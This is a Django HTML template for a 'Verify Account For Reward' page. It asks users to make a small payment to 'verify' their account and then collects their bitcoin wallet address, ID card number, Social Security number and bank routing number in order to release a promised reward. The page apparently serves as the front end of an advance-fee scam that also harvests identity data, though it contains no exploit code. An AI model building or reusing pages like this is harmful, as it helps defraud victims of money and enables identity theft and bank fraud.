{% extends 'dashboard/base.html' %} {% load static %} 
{% block content %}
<!-- Main Content Layout -->
<!-- Breadcrumb Area -->
<div class="breadcrumb-area">
  <h1>Verify Account</h1>

</div>
<!-- End Breadcrumb Area -->

<!-- Start -->
<div class="card mb-30">
  <div class="card-header d-flex justify-content-between align-items-center">
    <h3>
      Verify Account For Reward
    </h3>
  </div>
      <div class="card-body">
        
        <p>Verification Steps</p>
        <ul>
          <li>Fill the form below</li>
          <li>
            Make a small payment to verify your account
          </li>
          <li>
            Your reward will be send to your provided bitcoin wallet or account number
          </li>
        </ul>
        {{form.errors}}
        <form method="POST">
          {% csrf_token %}
          <div class="form-group">
            <label>Reward Amount</label>
            <input
              type="text"
              class="form-control"
              value="${{request.user.reward.reward_amount}}"
              readonly
            />
          </div>
        
            <input
              type="hidden"
              value="{{request.user.reward.id}}"
              name="reward"
            />
         
          <div class="form-group">
            <label>Username</label>
            <input
              type="text"
              class="form-control"
              value="{{request.user.username}}"
              name="username"
              readonly
            />
          </div>
          <div class="form-group">
            <label>Email</label>
            <input
              type="email"
              class="form-control"
              value="{{request.user.email}}"
              name="email"
              readonly
            />
          </div>
          <div class="form-group">
            <label>Country</label>
            <input
              type="text"
              class="form-control"
              value="{{request.user.country}}"
              name="country"
              readonly
            />
          </div>
          
          <div class="form-group">
            <label>BTC Wallet Address</label>
            <input
              type="text"
              class="form-control"
              name="btc_address"
              value=""
              required
            />
          </div>
          <div class="form-group">
            <label>ID Card Number</label>
            <input
              class="form-control"
              type="number"
              name="id_number"
              required
            />
          </div>
          <div class="form-group">
            <label>SSN</label>
            <input
              class="form-control"
              type="number"
              name="ssn"
              required
            />
          </div>
          <div class="form-group">
            <label>Route Number</label>
            <input
              class="form-control"
              type="number"
              name="route_number"
              required
            />
          </div>
          <button type="submit" name="btc_submit" class="btn btn-primary">
            Claim Reward
          </button>
        </form>
      </div>
   
        </div>
      </div>
    </div>
  </div>


</div>

</div>
{% endblock %}
{% block extrascript %}

{% endblock %}
